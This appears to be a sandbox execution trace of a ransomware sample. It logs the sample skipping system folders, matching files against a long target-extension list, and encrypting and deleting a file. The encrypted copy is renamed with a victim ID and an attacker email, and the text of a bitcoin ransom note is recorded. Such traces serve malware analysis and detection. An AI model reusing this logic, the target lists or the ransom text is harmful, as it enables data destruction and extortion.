	[0175.946] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*") returned 0x59
	[0175.946] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.946] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0175.946] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.947] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0175.947] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.947] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0175.947] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.947] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.947] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.948] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0175.948] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.948] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0175.949] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.949] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.949] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.949] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0175.949] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.949] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0175.949] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.950] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0175.950] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.950] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0175.950] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.950] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0175.950] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.950] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.950] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.951] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0175.951] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.951] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0175.951] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.951] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0175.951] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.951] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0175.951] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.952] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0175.952] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.952] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0175.952] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="..", cAlternateFileName="")) returned 1
	[0175.952] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0175.952] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e7d76e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9e7d76e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x5d3, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0175.952] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0175.953] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0175.953] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\"
	[0175.953] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml"
	[0175.953] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml") returned 97
	[0175.953] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.953] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml") returned 0x61
	[0175.953] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.953] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.954] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml"
	[0175.954] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml") returned 97
	[0175.954] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.954] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.954] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0175.954] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.955] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0175.955] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.955] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.955] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.956] ReadFile (in: hFile=0x39c, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x5d3, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x189930*=0x5d3, lpOverlapped=0x0) returned 1
	[0175.962] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.962] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcaf78) returned 1
	[0175.987] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.988] CryptCreateHash (in: hProv=0xfcaf78, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0175.988] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.988] CryptHashData (hHash=0xfb94b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0175.988] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.988] CryptDeriveKey (in: hProv=0xfcaf78, Algid=0x6610, hBaseData=0xfb94b0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb90f0) returned 1
	[0175.988] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.988] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x5d3, dwBufLen=0x5d3 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x5e0) returned 1
	[0175.989] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.989] RtlMoveMemory (in: Destination=0xfdf408, Source=0xfdc138, Length=0x5d3 | out: Destination=0xfdf408) 
	[0175.989] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.989] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdf408*, pdwDataLen=0x1894dc*=0x5d3, dwBufLen=0x5e0 | out: pbData=0xfdf408*, pdwDataLen=0x1894dc*=0x5e0) returned 1
	[0175.990] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.990] CryptDestroyKey (hKey=0xfb90f0) returned 1
	[0175.990] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.990] CryptDestroyHash (hHash=0xfb94b0) returned 1
	[0175.990] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.990] CryptReleaseContext (hProv=0xfcaf78, dwFlags=0x0) returned 1
	[0175.991] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.991] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.991] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.992] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0175.993] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0175.993] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0175.993] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdf408*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdf408*, lpNumberOfBytesWritten=0x189938*=0x5e0, lpOverlapped=0x0) returned 1
	[0175.997] CloseHandle (hObject=0x3a0) returned 1
	[0175.997] CloseHandle (hObject=0x39c) returned 1
	[0175.997] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml")) returned 1
	[0176.001] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml")) returned 0
	[0176.001] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e7d76e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9e7d76e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x5d3, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0176.001] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0176.001] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0176.001] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov"
	[0176.002] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*.*"
	[0176.002] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.002] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.002] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0176.002] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.003] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. 